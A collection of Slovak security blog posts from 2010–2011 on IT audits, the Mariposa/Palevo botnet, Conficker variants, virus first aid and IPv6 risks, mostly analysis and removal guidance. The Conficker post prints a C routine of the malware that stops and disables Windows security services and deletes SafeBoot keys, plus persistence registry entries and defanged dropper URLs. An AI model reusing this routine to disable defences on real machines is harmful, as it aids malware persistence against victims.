Staré blogy – bezpečnosť 3. časť

AAA – Audit, Analýza, Aplikácia výsledkov – 1.časť

Tieto 3A, sú často spomínané manažmentom, ale veľmi zriedkavo používané v praxi.

Takže sú zázračným riešením alebo je to iba výhovorka čí omielaná formulka?

 Co to teda ten audit je?

Hlavnou úlohou auditu IS/IT je podrobné posudzovanie rizík a hrozieb a odborné preverovanie kontrolných nástrojov a postupov či momentálneho stavu v informačných systémoch.

Nuž ak máte firemnú politiku akúkoľvek, audit by mal byť aspoň raz ročne, úplne v pohode stačí spravený interne. Aspoň zistíte čo máte v informačných systémoch. Veď spraviť audit nie je vôbec zložité. Sú relatívne lacné nástroje a dokonca niektoré sú zadarmo. (Napríklad WinAudit Freeware v2.28.2, Network Asset Tracker, Audit Pro, System Information for Windows (v platenej verzií) alebo sa dá využiť kombinácia rôznych iných programov.)

A často zistíte, že platíte za množstvo vecí, ktoré vôbec nepotrebujete. Taktiež je auditom ľahké zistiť vyťažovanie sieťe, pokiaľ samozrejme, nemáte dohľadový systém na LAN, a možno budete prekvapený čo vyťažuje komunikáciu.

 Takže ako začať?

 V prvom kroku sa treba rozhodnúť akí audit chcete robiť. Ísť do komplexného auditu (HW, SW, bezpečnosť, prevádzka LAN či vyťažiteľnosť IS) alebo urobiť čiastkový / čiastkové audity?

Obe varianty majú svoje pre i proti.

Komplexný audit je časovo i finančne náročnejší, pri predpoklade že to robí externá firma. No po jeho ukončení má firma komplexný prehľad o fungovaní a obsahu svojho informačného systému.

Čiastkový audit dokáže relativne rýchlo poskytnút prehľad o najpálčivejších oblastiach IS. Napríklad ked dochádzajú CAL alebo je v systéme priveľa nejasností ohľadom HW či účtov užívateľov.

Jedným z najdôležitejších je, aspoň podľa mňa, analýza bezpečnosti.

Analýza IS a IT bezpečnosti je jeden z najdôležitejších prvkov auditu, pričom sa posudzuje súlad reálneho stavu IS a IT voči existencií interných smerníc, fyzickej, organizačnej a logickej bezpečnosti s príslušnou legislatívou a internými nariadeniami organizácie.

(pokračovanie)

Redhawk | utorok 19. októbra 2010 11:39 | Prečítané: 3343 x


Mariposa BotNet – opäť na vzostupe

V apríli 2011 výrazne stúpol počet infikovaných počítačov botnetom Mariposa (Motýľ). To by nebolo nič zvláštne keby tu daný botnet neexistoval od decembra 2008. čím je špecifický?

Nuž je to hlavne tým, že vo svojej podobe s drobnými úpravami existuje od 2008 roku. V súčasnosti sa prioritne šíri 2mi spôsobmi – cez vírus W32 Virut (INF/Autorun (ESET) alebo W32/Autorun.worm (McAffe)) a cez p2p červa Win32.Palevo.

Botnet Mariposa alebo Butterfly Bot Kit vytvorili pôvodne ľudia z DDP Team (Días de Pesadilla Team – Nightmare Days Team), ktorých zatkla španielska polícia vo februári 2010. Členmi boli Florencio Carro Ruiz alias Netkairo (31), Jonathan Pazos Rivera alias jonyloleante (30) a Juan Jose Bellido Rios alias Ostiator (25) predpoklad, keďže činnosť Mariposy sa nezastavila, však je že korene botnetu sú v Rusku alebo na Ukrajine.

Prečo sa niečím tak starým zaoberať?

Nuž je to jednoduché v apríli 2011 vzrástol počet zombie PC (počítačov zapojených do botnetu) zapojených do Mariposy na 2 milióny infikovaných počítačov.

V marci 2010 bol botnet skoro zničený, oproti decembru 2009, keď počet zombie PC bol niečo okolo 13 miliónov v 190 krajinách sveta, klesol počet pc v botnete na niečo okolo 230 000.

V súčasnosti sa primárne šíri varianta cez Palevo P2P alebo cez novú variantu Win32/Virut.

Detekujú ich skoro všetky antivírové programy, horšie to však je z odstraňovaním. Najviac problémov je so serverovými verziami OS Windows 2000 – 2008.

palevo-stringdump-usb_110708.jpg

Obr. Dump stringu Palevo

Automaticky si dokážu s niektorými variantami infektorov Mariposy, P2P Palevo aj Virut, poradiť programy Malwarebytes a SpyHunter. Niektoré varianty treba vyriešiť manuálne s právami administrátora.

Takže stručný návod ako to vyriešiť pri infektore Palevo.

1.) zastavte proces antispy.exe (%UserProfile%\Application Data\antispy.exe) cez Task manager alebo cez Process Explorer (Sysinternals)

2.) vymažte daný súbor – %UserProfile%\Application Data\antispy.exe
3.) vymažte z registrov všetky záznamy k danej infiltrácií
HKEY_CURRENT_USER\Software\Malware Defense
HKEY_CLASSES_ROOT\CLSID\{5E2121EE-0300-11D4-8D3B-444553540000}
HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers\SimpleShlExt
HKEY_LOCAL_MACHINE\SOFTWARE\Paladin Antivirus
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System ‘DisableTaskMgr’ = ‘1’
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ‘SelfdelNT’

4.) vymažte zostávajúce odkazy a súbory
%Documents and Settings%\[UserName]\Start Menu\ About.lnk
%UserProfile%\Application Data\antispy.exe

Po reštarte Windows odporúčam pustiť kontrolu antivírovým programom, najlepšie z live CD.

palevo18_110708.jpg

Obr. Whireshark dump stringu Palevo

Proces ako sa manuálne zbaviť infektora Virut alebo INF/Autorun:

1.) Nastavte zobrazenie skrytých a systémových súborov (poprípade ak máte, použite TotalComander)

2.) Nájdite súbor autorun.inf a editujte ho.

3.) podľa zadanej cesty vymažte priečinok a následne aj daný autorun.inf

4.) reštartujte PC

Po reštarte Windows odporúčam pustiť kontrolu antivírovým programom, najlepšie z live CD.

autorun_110708.jpg

Obr. Autorun.inf

Charakteristika Mariposy:

1. Polymorfia kódu

2. Inštalácia ako skrytý – v koreňovom adresári vytvorí súbor autorun.inf, a adresár s rootkitom
3. Direct code injection do explorer.exe (DCI)spravý infiltráciu súboru explorer.exe čo je vlastne GUI Windows(nie Internet Explorer) čím si zabezpečí štartovanie a beh
4. Spúšťanie cez registre (Windows s UAC)
5. Kontrola executable file aby sa predišlo zmazaniu súborov botnetu antivírom alebo užívateľom
6. Kontrola bežiacich procesov.
7. Obrana Anti-x – proti vmware, virtualpc, debugger 1 & 2, anubis, TE, sandbox, norman sandbox, sunbelt sandbox
8. Kontrola komunikačných protokolov
9. Aktualizuje sa a bráni aktualizácií OS a antivíru
10. TCP (SYN) a UDP flood
11. kradne heslá z Firefox 2.x, Firefox 3.x, Internet Explorer 6, Internet Explorer 7, Chrome, Opera 9.x, 10.x
12. Reverse Socks4, Socks5, HTTP socks

Pre záujemcov odporúčam prácu Matta Thompsona –Mariposa Botnet Analysis z februára 2010 kde je popísaný celý botnet.

Redhawk | piatok 08. júla 2011 08:28 | Prečítané: 2763 x


Prvá pomoc pri podozrení na vírusy

V poslednom čase sa množia problémy s vírmi, ktoré AV programi proste nechytajú. Čo teda robiť?

1.) Pokiaľ máte podozrenie na malware, skontrolujte si funkčnosť antivíru a poprípade skontrolujte v ako stave sú bežiace procesy Windows:

 Do príkazového riadku postupne napíšte:

Sc.exe query wuauserv
Sc.exe query bits
Sc.exe query windefend
Sc.exe query ersvc

sc query_110614.png

Obr. Dostanete odozvu.

 2.) Skontrolujte bežiace procesy (použite Proces explorer alebo nejakú inú utilitu)

Hľadajte podozrivé alebo neštandardné procesy

pokiaľ tam vidíte proces Iaslogon je tam Conficker v núdzovom režime urobte delete súboru System32\doieuln.dll a zakážte spúšťanie Iaslogon

3.) použite niektorý zo skenerov:

Combofix – ten je momentálne aj pre Windows 7

Gromozon Rootkit Removal Tool – od PrevX

Malwarebytes

SanityCheck

Stinger od McAfee

Malicious Software Removal Tool – od Microsoftu

Sophos Anti-Rootkit

Radix Package – od Rakusanov

Špeciálne antirootkity od North Security lab (napr. aj na infikáciu systémov s AMD-V technológiami)

 Osobne sa mi osvedčila kombinácia Combofix a následne nainštalovanie Malwarebytes. Pre zložitejšie problémy a nemožnosť inštalácie je najlepšie použiť nejaké cd s operačným systémom, ktoré má väčšina antivírových firiem:

AviraKasperskyAVG

BitDefender Rescue CD
F-Secure Rescue CD
Trinity Rescue Kit CD (linuxová distribúcia so 4 antivírmi – Clam AV, AVG, F-Prot, BitDefender)
Shardana Antivirus Rescue Disc
Dr Web Live Bootable Antivirus CD

Alebo špecifický Alternate Operating System Scanner

Redhawk | utorok 14. júna 2011 20:24 | Prečítané: 5136 x


Conficker C, varianta z 11.3.2011

11.marca 2011 vydala skupina neznámych tvorcov, asi z Číny, novú variantu víru Conficker C, ktorá je podstatne iná než predošlé varianty confickeru B a C. Tak si trochu naň posvietime.

Existuje v súčasnosti 5 poddruhov Confickeru, ktoré majú veľa spoločných znakov ale v podstate nejde o nejaké veľké rozdiely.

 Conficker A

Činnosť: zneužitie NetBIOS a chyby MS08-067

Spôsob updatu: HTTP

Ochrana (self-defence): bez ochrany

Conficker B

Činnosť: zneužitie NetBIOS, chyby MS08-067, výmenné média, (vytvára Autorun súbor (trojan)), slovníkový útok na share ADMIN$

Spôsob updatu: HTTP, NetBIOS na odstránenie záplaty opravujúcej chybu MS08-067 a obnovenie backdooru

Ochrana (self-defence): zastavenie automatických aktualizácií, blokovanie DNS lookup

Conficker C

Činnosť: zneužitie NetBIOS, chyby MS08-067, výmenné média, (vytvára Autorun súbor (trojan)), slovníkový útok na share ADMIN$

Spôsob updatu: HTTP, NetBIOS na odstránenie záplaty opravujúcej chybu MS08-067 a obnovenie backdooru, vytvorenie URL remote linky na botnet.

Ochrana (self-defence): zastavenie automatických aktualizácií, blokovanie DNS lookup

Conficker D

Činnosť: žiadna činnosť, ide o update Confickeru C a následný update na Conficker E

Spôsob updatu: HTTP, kontroluje v okolí infikované PC a spustí update.

Ochrana (self-defence): zastavenie automatických aktualizácií, blokovanie DNS lookup (zakáže pripájanie k istým stránkam, hlavne výrobcov antivírových riešení) opatchovaním DNSAPI.dll (Windows XP) alebo DNSRSLVR.dll (Windows Vista, Seven)

Conficker E

Činnosť: zneužitie NetBIOS, chyby MS08-067, výmenné média, (vytvára Autorun súbor (trojan)), slovníkový útok na share ADMIN$

Spôsob updatu: HTTP z IP poolu Ukrajiny, NetBIOS na odstránenie záplaty opravujúcej chybu MS08-067 a obnovenie backdooru, vytvorenie URL remote linky na botnet.

Ochrana (self-defence): zastavenie automatických aktualizácií, blokovanie DNS lookup, odstavenie alebo infikovanie procesov antimalware programov, reset služby obnovovania systému (zmaže predošlé restore pointy a vytvotí ich nové s vlastnou kópiou).

Ako vidieť nie je to úplne jednoduché členenie. Vo svojej podstate sa v súčasnosti dá stretnúť len s dvomi variantami Confickeru – C a E. Bežne je v povedomí, že Conficker bol vyriešený v roku 2009-2010 hlavne záplatami na Windows XP a Server 2003 (chyba MS08-067). Ako som v novinke písal 11.3.2011 bola vydaná nová varianta. Ide o mutáciu Conficker C, ktorá obsahuje všetky vymoženosti varianty E a k tomu špecialitku – snahu získať kontrolu alebo údaje z Active Directory, ak sa napadnuté PC nachádza v sieti s doménou. Heslá sa pokúša zistiť za pomoci RainbowTables zo získaných hash.

Kontroluje si dátum na nasledovných serveroch:

Ask.com
Google.com
Baidu.com
Yahoo.com
W3.org

Zastaví navyše procesy – Windows Security Center Service (wscsvc), BITS (Background Intelligent Transfer Service)Windows Error Reporting Service (wersvc) a Error reporting service.

V registroch si vytvorí nové kľúče:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

%random name% = rundll32.exe %letra unidad%\RECYCLER\%random name%\%random filename.vmx

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

TcpNumConnections = 0x00FFFFFE

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\

Services\netsvcs

Image Path = %sysdir%\svchost.exe -k netsvcs

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\

Services\netsvcs\Parameters

ServiceDll = %name of the drive%\RECYCLER\%random name%\%random filename%.vmx

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters pridá “TcpNumConnections” = “0x00FFFFFE” a pridá list blokovaných domén.

A upraví nasledovné:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL

CheckedValue = 1 na 0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

SuperHidden = 1 na 0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

Hidden = 1 na 0

Čím ukryje všetky súbory a priečinky s atribútom skrytý.

Pre zaujímavosť postup deaktivácie bezpečnostných služieb a procesov :

BOOL  disable_security_services_and_terminate_conficker_cleaners()
{
HANDLE v;
void *ThreadId;

ThreadId = this;
disable_security_service(“wscsvc”);
disable_security_service(“WinDefend”);
disable_security_service(“wuauserv”);
disable_security_service(“BITS”);
disable_security_service(“ERSvc”);
disable_security_service(“WerSvc”);
SHDeleteValueA(HKEY_LOCAL_MACHINE, “Software\\Microsoft\\Windows\\CurrentVersion
\\Run”, “Windows Defender”);
callSHDeleteKeyW(
HKEY_LOCAL_MACHINE,
“Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\ShellServiceObjects\\
{FD6905CE-952F-41F1-9A6F-135D9C6622CC}”);
callSHDeleteKeyW(HKEY_LOCAL_MACHINE, “SYSTEM\\CurrentControlSet\\Control\\SafeBoot”);
v = CreateThread(0, 0, monitor_and_terminate_conficker_cleaners, 0, 0, (DWORD *)
&ThreadId);
return CloseHandle(v);
}

int disable_security_service(LPCSTR lpServiceName)
{
void *hSCObject;
char ServiceStatus;
int v;

result = 0;
hSCObject = OpenSCManagerA(0, 0, SC_MANAGER_ALL_ACCESS);
// open service manager with all access granted
if ( hSCObject )
{
v = OpenServiceA(hSCObject, lpServiceName, 0x20027u);
// open the specified service
if ( v )
{
if ( QueryServiceStatus(v, (struct _SERVICE_STATUS *)&ServiceStatus) )
// query the service status
{
if ( ServiceType != SERVICE_KERNEL_DRIVER )
// check if the service is not a device driver
{
success = ControlService(v, 1u, (struct _SERVICE_STATUS *)
&ServiceStatus); // notifies the service that it should stop
if ( success )
Sleep(4000); // sleep 4 seconds
}
}
result |= ChangeServiceConfigA(v, 0xFFFFFFFFu, 4u, 0xFFFFFFFFu,
0, 0, 0, 0, 0, 0, 0);
// set the service configuration so that the service is never started
CloseServiceHandle(v);
}
CloseServiceHandle(hSCObject);
}
return result;
}

 

conficker c_110408.jpg

Obr. činnosť Conficker C

Conficker si preverí a zastaví zoznam 23 programov a vlákien k nim:

autoruns

avenger

confick

downad

filemon

gmer

hotfix      – security  patche Microsoftu

kb890       – patch Microsoftu

kb958       – patch Microsoftu

kido

klwk

mbsa.

mrt

mrtstub

ms08-06     – patch Microsoftu

procexp

procmon

regmon

scct_

sysclean

tcpview

unlocker

wireshark

Táto varianta Confickeru C prevedie scan TCP a UDP portov 0, 1, 2, 5, 10, 14, 23, 27, 31, 36, 37, 39, 42, 46, 49, 50, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 127, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 191, 197 a 223 – 255.

Následne niektorý z nich náhodne vyberie a pripojí sa k P2P botnetu.

 

conficker c_p2p_110408.jpg

Obr. Pripojenie k botnetu.

Výsledkom rozšírenia novej verzie Confickeru je plošný SQL injection útok z 3/2011, ktorý bol vykonaný z botnetu Asprox v Číne (typu FasFlux)  za účelom rozšírenia rouge AV (freesystemscan.exe).

 

asprox_110408.png

Obr. Asprox botnet

Stiahnuť Smile si ho môžete ako súčasť rouge antivíru Windows Stability Center (alternatívne názvy – Red Cross Antivirus, Peak Protection 2011, Pest Detector, Major Defense Kit, ThinkPoint, AntiSpySafeguard, AntiSpy Safeguard). Poprípade na infikovaných stránkach kde je dropper, ktorý stiahne tento rouge AV (zmenil som doményale i tak je jednoduché sa k tomu dopracovať):

lizamoon.xxp/ur.php

tadygus.xxp/ur.php

alexblane.xxp/ur.php

alisa-carter.xxp/ur.php

online-stats201.xxp/ur.php

stats-master111.xxp/ur.php

agasi-story.xxp/ur.php

general-st.xxp/ur.php

extra-service.xxp/ur.php

t6ryt56.xxp/ur.php

sol-stats.xxp/ur.php

google-stats49.xxp/ur.php

google-stats45.xxp/ur.php

google-stats50.xxp/ur.php

stats-master88.xxp/ur.php

eva-marine.xxp/ur.php

stats-master99.xxp/ur.php

worid-of-books.xxp/ur.php

google-server43.xxp/ur.php

tzv-stats.xxp/ur.php

milapop.xxp/ur.php

Autori sa predpokladajú z Číny (vzhľadom k použitiu čínskeho botnetu) ale je tu isté podozrenie aj smerom k USA. Dôvod je jednoduchý, najviac infekciíí bolo zatiaľ v Číne, Austrálií a Brazílií.

Redhawk | piatok 08. apríla 2011 12:20 | Prečítané: 3230 x


Pripravuje sa nový botnet

Windows User Group - Slovak Republic

V krajinách bývalého ZSSR sa opäť posúvajú v IT bezpečnosti trochu vpred.

 

Pokiaľ sa vám zdalo, že botnet malware Conficker, Aurora, NightDragon, Palevo, Zeus/SpyEye alebo ShadyRAT sú nebezpečné, tak musím Vás sklamať. V súčasnosti sa rodí v Rusku projekt, ktorý bude využívať všetky pozitíva daných sietí plus niečo navyše. Prakticky bude minimálne do času, kým sa nenájde dosť mutácií a zhodných identifikátorov pre antivírové programy neviditeľný.

Ide o malware nového typu, ktorý pracuje úplne autonómne.
Pôvodne boli s pohľadu správy iba 2 typy, prvý centralizovaný botnet a decentralizovaný (takzvaný P2P) botnet.

Obr. Centralizovaný botnet

Obr. Decentralizovaný botnet

Daný projekt predpokladá, že z ktoréhokoľvek klienta-bota (zombie PC) bude možné spraviť Master (mother ship). Bude mať uchované všetky dostupné údaje o uložení databáz a o tabuľkách cieľov.

Takýmto spôsobom sa predíde zničeniu botnet siete odstavením masteru alebo zablokovaním jeho IP adries.
Dáta a databázy budú uložené niekde v cloude a údaje o umiestnení databáz u klienta nebudú “viditeľné” skôr ako to nebude nutné.
Malo by k tomu dôjsť pri pripojení infikovaného počítača do internetu s vynechaním 2-5 kontrolných spojení na master. Daný BotNet už teraz v skúšobnej verzií plne pracuje na IPv4 a aj IPv6.
Plne bude podporovať mutáciu kódu a polymorfné techniky v relatívne vysokej frekvencií zmien, do niekoľkých hodín. Čím by sa malo aspoň na určitý čas predísť detekcií od výrobcov antivírových riešení.
V súčasnosti sa pripravujú 3 varianty infektorov, pre platformu MS (exe), Linux (elf) a Android (apk).
Časť botov by mal prevziať z databáz confickeru (v súčasnosti okolo 3,6 milióna zombie PC) a Paleva (cca 80-90 tisíc zombie PC).

V súčasnosti je aktívných botnetov niečo medzi 5500-5700. Mnohé ešte používajú staré spôsoby a nie sú dané infektory veľmi šikovné, na strane druhej sú špecialitky, ktoré sú šikovné ako Confiker. Medzi tie prvé patrí Win32/Penepe a medzi tie šikovné Win32/Mofksys.
Taktiež množstvo malwaru stále vsádza na užívateľa a distribuje sa ako antivírus (tkzv. Rouge antivírus) ako napríklad Win32/Katusha.

Osobne budem ešte istý čas dôsledne monitorovať dané fórum ohľadom vývoja tohoto nového systému.

Redhawk | štvrtok 27. októbra 2011 00:30 | Prečítané: 2092 x


IPv6 – možné bezpečnostné riziká

Prechod na IPv6 alebo súbeh IPv4A IPv6 prináša niekoľko rizík.

Ako som písal v jednom staršom blogu, problém je už v samotnej aplikácií protokolu IPv6 v operačných systémoch.

Kde implementácia v operačných systémoch vyzerá zhruba takto:
Microsoft Windows používa číselnú identifikáciu zóny: fe80::3%1
BSD používa číselnú identifikáciu zóny: fe80::3%pcn0
Linux používa číselnú identifikáciu zóny: fe80::3%eth0.

 

To značí problém s komunikáciou pri multiplatformových LAN. Dnes sa však skôr zameriam na možné riziká v bezpečnosti.

A to v oblasti, ktorá môže byť zneužitá útočníkom.

Jedným z problémov je koexistencia IPv6 a IPv4 v sieti (či už ide o segment LAN, WAN). Dôvod je ako sa konvertuje z jedného protokolu do druhého. Celý proces prekladu prebieha pomocou technológie Man in The Middle (prostredník) kde sa pakety rozbaľujú a následne prebaľujú.

 

Ďaľším kameňom je používanie technológie 6to4 alebo 6RD, príbuzné technológie, ktoré umožňujú paketom IPv6 vstupovať do sietí s IPv4. Samozrejme bez nutnej konfigurácie tunelovania cez proxy. Tento spôsob dáva možnosti použiť rôzne discovery útoky (spoofing, reflection attack a podobne). (pekný popis implementácie 6rd od Junipers v PDF)

Ako jedna z možností pre zmenšenie rizík je nasadenie DNSSEX (DNS Security Extension) ktorý plne podporuje IPv6 a umožňuje zároveň paritu s IPv4.

 

Ďaľším s problémov je využitie Extension Headers na DDoS útoky. pripomeniem žepakety u oboch protokolov sú v podstate nekompatibilné IPv4 má hlavičku a náklad, kdežto IPv6 tvorí kompletný paket hlavička + rozširujúca hlavička (extension header) + náklad.

Ako vidieť pakety sú rozdielne a hlavička paketu IPv6 je rozšíriteľná sadou Extension Headers.

Pokiaľ používate firewall alebo proxy, tak Vám tok dát z väčším množstvom paketov mohol spôsobiť pád daných služieb.

V kombinácií väčšieho počtu paketov a využitia Neighbor discovery (prehľadávania okolitých počítačov) dostáva potencionálny útočník do ruky podstatne zaujímavejší nástroj ako bol ARP spoofing z IPv4 (iked v podstate Neighbor discovery funguje rovnako ako ARP až na to, že je možné využívať napríklad službu Duplicate Adress Detection (detekciu zdvojených adries).

Taktiež v súčasnosti nie je úplne dotiahnutá implementácia IPSec v protokole IPv6 (i ked je daná funkcia v IPv6 povinná). Spôsob nevhodnej implementácie umožnuje odchytávať a otvárať jednotlivé pakety.

Takže ako vidieť nie je problém iba s postavením siete na IPv6 ale i z jeho prevádzkou a to by sa u tak starej veci nemalo diať. Snáď sa to zlepší ako sa rozšíri používanie IPv6 vo firmách a jeho postupne nasadenie namiesto IPv4.

PS: Tento blog mal iba upozorniť a nie rozviesť problematické oblasti pri používaní IPv6. Totiž jeho použitiu sa už asi nevyhneme keďže došli IPv4 adresy. 

Pre tých, ktorých konkrétnejšie zaujali dané citlivé miesta, odporúčam google.

Redhawk | piatok 19. augusta 2011 00:17 | Prečítané: 2757 x

Pridaj komentár

Zadajte svoje údaje, alebo kliknite na ikonu pre prihlásenie:

WordPress.com Logo

Na komentovanie používate váš WordPress.com účet. Odhlásiť sa / Zmeniť )

Twitter picture

Na komentovanie používate váš Twitter účet. Odhlásiť sa / Zmeniť )

Facebook photo

Na komentovanie používate váš Facebook účet. Odhlásiť sa / Zmeniť )

Google+ photo

Na komentovanie používate váš Google+ účet. Odhlásiť sa / Zmeniť )

Connecting to %s